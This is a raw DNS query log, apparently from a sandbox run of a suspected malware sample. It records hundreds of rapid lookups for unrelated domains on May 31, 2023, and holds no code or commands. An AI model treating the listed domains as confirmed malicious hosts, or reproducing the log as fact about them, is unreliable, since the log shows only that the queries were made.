                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.716789007 CEST192.168.2.38.8.8.80xe6d1Standard query (0)avse.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.780672073 CEST192.168.2.38.8.8.80x2ba3Standard query (0)ssm.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.805001974 CEST192.168.2.38.8.8.80xe15aStandard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.845474958 CEST192.168.2.38.8.8.80x6598Standard query (0)yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.857023954 CEST192.168.2.38.8.8.80xc4dfStandard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.860512018 CEST192.168.2.38.8.8.80xad62Standard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.892419100 CEST192.168.2.38.8.8.80x1985Standard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:28.948687077 CEST192.168.2.38.8.8.80xc3baStandard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.162076950 CEST192.168.2.38.8.8.80x4be7Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.207812071 CEST192.168.2.38.8.8.80x5b9bStandard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.207812071 CEST192.168.2.38.8.8.80x33aaStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.230943918 CEST192.168.2.38.8.8.80x1bd4Standard query (0)bigzz.byA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.238435030 CEST192.168.2.38.8.8.80x5c3aStandard query (0)umcor.amA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.250312090 CEST192.168.2.38.8.8.80x9205Standard query (0)shesfit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.254642963 CEST192.168.2.38.8.8.80x16c9Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.256290913 CEST192.168.2.38.8.8.80xa4b7Standard query (0)ossir.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.258771896 CEST192.168.2.3202.12.27.330x3Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.263830900 CEST192.168.2.38.8.8.80x68acStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.305953026 CEST192.168.2.38.8.8.80xeb7eStandard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.317794085 CEST192.168.2.38.8.8.80xd05bStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.386768103 CEST192.168.2.38.8.8.80xb4aeStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.491319895 CEST192.168.2.38.8.8.80xf046Standard query (0)webways.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.491559982 CEST192.168.2.38.8.8.80x9674Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.497034073 CEST192.168.2.3193.0.14.1290x55Standard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.511173964 CEST192.168.2.38.8.8.80xe12Standard query (0)impexnc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.518611908 CEST192.168.2.3192.228.79.2010x38Standard query (0)deNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.538358927 CEST192.168.2.38.8.8.80xf888Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.556087971 CEST192.168.2.38.8.8.80x13a5Standard query (0)diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.562966108 CEST192.168.2.38.8.8.80xf115Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.630104065 CEST192.168.2.38.8.8.80x8cfdStandard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.640701056 CEST192.168.2.38.8.8.80x6365Standard query (0)vonparis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.674403906 CEST192.168.2.38.8.8.80xdf9dStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.693259954 CEST192.168.2.38.8.8.80x89ceStandard query (0)ramkome.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.694374084 CEST192.168.2.3128.8.10.900x19Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.702882051 CEST192.168.2.38.8.8.80x6a7Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.720201969 CEST192.168.2.38.8.8.80xaaecStandard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.728297949 CEST192.168.2.38.8.8.80xde7cStandard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.815346956 CEST192.168.2.38.8.8.80xe15aStandard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.825103998 CEST192.168.2.38.8.8.80x8d2Standard query (0)valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.837234974 CEST192.168.2.38.8.8.80x5f79Standard query (0)bount.com.twA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.838877916 CEST192.168.2.38.8.8.80xf0aaStandard query (0)oaith.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.865408897 CEST192.168.2.38.8.8.80xbfb4Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.865408897 CEST192.168.2.38.8.8.80x1021Standard query (0)insia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.867343903 CEST192.168.2.38.8.8.80xa14fStandard query (0)nts-web.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.883073092 CEST192.168.2.38.8.8.80xf513Standard query (0)geecl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.892570972 CEST192.168.2.38.8.8.80x396dStandard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.912302971 CEST192.168.2.38.8.8.80x8213Standard query (0)forbin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:29.939012051 CEST192.168.2.38.8.8.80x2b45Standard query (0)orlyhotel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:30.044307947 CEST192.168.2.38.8.8.80xa90bStandard query (0)valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:30.085642099 CEST192.168.2.38.8.8.80x70ffStandard query (0)nekono.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:30.114729881 CEST192.168.2.38.8.8.80x2d19Standard query (0)magicomm.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:30.169097900 CEST192.168.2.38.8.8.80x417aStandard query (0)pleszew.policja.gov.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:30.171086073 CEST192.168.2.38.8.8.80xa3a9Standard query (0)muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:30.203571081 CEST192.168.2.3193.0.14.1290x49Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:30.226480007 CEST192.168.2.3192.36.148.170x1fStandard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:30.252991915 CEST192.168.2.38.8.8.80x5bd3Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:30.263223886 CEST192.168.2.3198.41.0.40xb1Standard query (0)deNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:30.301717997 CEST192.168.2.38.8.8.80xa401Standard query (0)dhh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:30.313107014 CEST192.168.2.38.8.8.80xdc49Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:30.334417105 CEST192.168.2.38.8.8.80xd667Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:30.383488894 CEST192.168.2.38.8.8.80xd77eStandard query (0)hbfuels.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:30.397627115 CEST192.168.2.38.8.8.80xe690Standard query (0)dbnet.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:30.467902899 CEST192.168.2.38.8.8.80xc144Standard query (0)floopis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:30.557790995 CEST192.168.2.38.8.8.80xdc26Standard query (0)nrsi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:30.565606117 CEST192.168.2.38.8.8.80x5135Standard query (0)bidroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:30.569480896 CEST192.168.2.38.8.8.80x3917Standard query (0)xinhui.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:30.575057030 CEST192.168.2.38.8.8.80x4451Standard query (0)notis.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:30.584189892 CEST192.168.2.38.8.8.80x2022Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:30.697911024 CEST192.168.2.38.8.8.80xa2f4Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:30.702436924 CEST192.168.2.38.8.8.80x746aStandard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:30.710477114 CEST192.168.2.38.8.8.80xa33dStandard query (0)floopis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:30.794302940 CEST192.168.2.38.8.8.80x50dfStandard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:30.908730030 CEST192.168.2.38.8.8.80xe15aStandard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:30.908730030 CEST192.168.2.38.8.8.80x396dStandard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:30.915185928 CEST192.168.2.38.8.8.80xf385Standard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:30.961123943 CEST192.168.2.38.8.8.80x3d31Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:30.973063946 CEST192.168.2.38.8.8.80xa45Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.001126051 CEST192.168.2.38.8.8.80xcb3cStandard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.053881884 CEST192.168.2.38.8.8.80x2e08Standard query (0)onzcda.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.076414108 CEST192.168.2.38.8.8.80x55d2Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.208131075 CEST192.168.2.38.8.8.80x6cefStandard query (0)kayoaiba.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.224415064 CEST192.168.2.38.8.8.80x2cfcStandard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.235951900 CEST192.168.2.38.8.8.80xca34Standard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.347800970 CEST192.168.2.38.8.8.80x896bStandard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.417365074 CEST192.168.2.38.8.8.80x6f4fStandard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.539793015 CEST192.168.2.38.8.8.80xd6b2Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.569195032 CEST192.168.2.38.8.8.80xde2aStandard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.589910030 CEST192.168.2.38.8.8.80x1b0bStandard query (0)mkm-gr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.609942913 CEST192.168.2.38.8.8.80x222dStandard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.615530014 CEST192.168.2.38.8.8.80x7addStandard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.630976915 CEST192.168.2.38.8.8.80xf389Standard query (0)acraloc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.665442944 CEST192.168.2.38.8.8.80x6c82Standard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.683949947 CEST192.168.2.38.8.8.80x52d0Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.698749065 CEST192.168.2.38.8.8.80xf3e5Standard query (0)envogen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.717164993 CEST192.168.2.38.8.8.80xe1d8Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.738348007 CEST192.168.2.38.8.8.80xc573Standard query (0)nlcv.bas.bgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.785161018 CEST192.168.2.38.8.8.80x242Standard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.789908886 CEST192.168.2.38.8.8.80x90dcStandard query (0)xult.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.794651985 CEST192.168.2.38.8.8.80x492bStandard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.909039974 CEST192.168.2.38.8.8.80x44d8Standard query (0)clinicasanluis.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.909039974 CEST192.168.2.38.8.8.80xb499Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.909282923 CEST192.168.2.38.8.8.80x6f5bStandard query (0)strazynski.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.912123919 CEST192.168.2.38.8.8.80x5e1fStandard query (0)wahw.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.915720940 CEST192.168.2.38.8.8.80x7499Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:31.970180035 CEST192.168.2.38.8.8.80x8761Standard query (0)captlfix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.006175995 CEST192.168.2.38.8.8.80xcb3cStandard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.029442072 CEST192.168.2.38.8.8.80x1d0dStandard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.067907095 CEST192.168.2.38.8.8.80x248bStandard query (0)sigtoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.070259094 CEST192.168.2.38.8.8.80x4fdcStandard query (0)coxkitchensandbaths.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.131346941 CEST192.168.2.38.8.8.80xca7dStandard query (0)shiner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.245779991 CEST192.168.2.38.8.8.80x2cbbStandard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.262274027 CEST192.168.2.38.8.8.80x6fe0Standard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.309149981 CEST192.168.2.38.8.8.80x5ed8Standard query (0)kallman.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.362539053 CEST192.168.2.38.8.8.80x4cdStandard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.364007950 CEST192.168.2.38.8.8.80xcac1Standard query (0)keio-web.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.409885883 CEST192.168.2.38.8.8.80x4177Standard query (0)adeesa.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.458686113 CEST192.168.2.38.8.8.80xf5e0Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.482253075 CEST192.168.2.38.8.8.80x9497Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.486900091 CEST192.168.2.38.8.8.80xff58Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.601042032 CEST192.168.2.38.8.8.80xf141Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.603147030 CEST192.168.2.38.8.8.80x657dStandard query (0)flamingorecordings.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.618840933 CEST192.168.2.38.8.8.80xbdebStandard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.619816065 CEST192.168.2.38.8.8.80x6b99Standard query (0)peminet.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.654861927 CEST192.168.2.38.8.8.80x3cc5Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.660171986 CEST192.168.2.38.8.8.80xcebaStandard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.679419994 CEST192.168.2.38.8.8.80x8b45Standard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.681708097 CEST192.168.2.38.8.8.80xf7b2Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.738862038 CEST192.168.2.38.8.8.80xf7d7Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.776515007 CEST192.168.2.38.8.8.80xeeddStandard query (0)hchc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.780364990 CEST192.168.2.38.8.8.80x9630Standard query (0)linac.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.800115108 CEST192.168.2.38.8.8.80xa88aStandard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.806649923 CEST192.168.2.38.8.8.80x99fcStandard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.831309080 CEST192.168.2.38.8.8.80x16cdStandard query (0)daytonir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.902179003 CEST192.168.2.38.8.8.80xaa7eStandard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.919889927 CEST192.168.2.38.8.8.80xda02Standard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.923059940 CEST192.168.2.38.8.8.80xc1c6Standard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.934946060 CEST192.168.2.38.8.8.80x1dd3Standard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:32.936156034 CEST192.168.2.38.8.8.80x1a4bStandard query (0)hyab.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.051486969 CEST192.168.2.38.8.8.80x4c7fStandard query (0)valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.102035046 CEST192.168.2.38.8.8.80xd67Standard query (0)thiessen.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.108206987 CEST192.168.2.38.8.8.80xe421Standard query (0)mackusick.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.149257898 CEST192.168.2.38.8.8.80xf2c3Standard query (0)sokuwan.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.164141893 CEST192.168.2.38.8.8.80x3c59Standard query (0)bggs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.242181063 CEST192.168.2.38.8.8.80xc96eStandard query (0)ftmobile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.248156071 CEST192.168.2.38.8.8.80x1559Standard query (0)alexpope.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.263648987 CEST192.168.2.38.8.8.80x70adStandard query (0)wantapc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.367326975 CEST192.168.2.38.8.8.80x28b5Standard query (0)uster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.400279045 CEST192.168.2.38.8.8.80x35f6Standard query (0)usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.582743883 CEST192.168.2.38.8.8.80xf1cdStandard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.741221905 CEST192.168.2.38.8.8.80x4d26Standard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.818466902 CEST192.168.2.38.8.8.80x3c25Standard query (0)mijash3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.929508924 CEST192.168.2.38.8.8.80x8ae0Standard query (0)fdlymca.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:33.937041044 CEST192.168.2.38.8.8.80xca1cStandard query (0)dwid.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:34.008554935 CEST192.168.2.38.8.8.80x15b4Standard query (0)ldh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:34.038069010 CEST192.168.2.38.8.8.80x2e3fStandard query (0)isom.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:34.075496912 CEST192.168.2.38.8.8.80xf120Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:34.206155062 CEST192.168.2.38.8.8.80xee81Standard query (0)acraloc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:34.208642006 CEST192.168.2.38.8.8.80x70e4Standard query (0)gphpedit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:34.212753057 CEST192.168.2.38.8.8.80x306dStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:34.304124117 CEST192.168.2.38.8.8.80x8d95Standard query (0)fdlymca.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:34.388936996 CEST192.168.2.38.8.8.80x86caStandard query (0)sgk.home.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:34.425808907 CEST192.168.2.38.8.8.80x5084Standard query (0)scip.org.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:34.581617117 CEST192.168.2.38.8.8.80x5bbdStandard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:34.609287024 CEST192.168.2.38.8.8.80xcefaStandard query (0)noblesse.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:34.623456955 CEST192.168.2.38.8.8.80xa087Standard query (0)bigzz.byA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:34.664761066 CEST192.168.2.38.8.8.80xf86cStandard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:34.880527973 CEST192.168.2.38.8.8.80x4e32Standard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:34.964772940 CEST192.168.2.3128.8.10.900x19Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:35.103862047 CEST192.168.2.38.8.8.80x81e4Standard query (0)xult.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:35.119699001 CEST192.168.2.38.8.8.80x48daStandard query (0)gydrozo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:35.281909943 CEST192.168.2.38.8.8.80xbe79Standard query (0)amic.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:35.289186001 CEST192.168.2.38.8.8.80xf497Standard query (0)kayoaiba.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:35.435511112 CEST192.168.2.38.8.8.80x52b5Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:35.448925018 CEST192.168.2.38.8.8.80xe8a4Standard query (0)holp-ai.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:35.518923044 CEST192.168.2.38.8.8.80x4ec6Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:35.555329084 CEST192.168.2.38.8.8.80x1e8eStandard query (0)wolffkran.deA (IP address)IN (0x0001)false
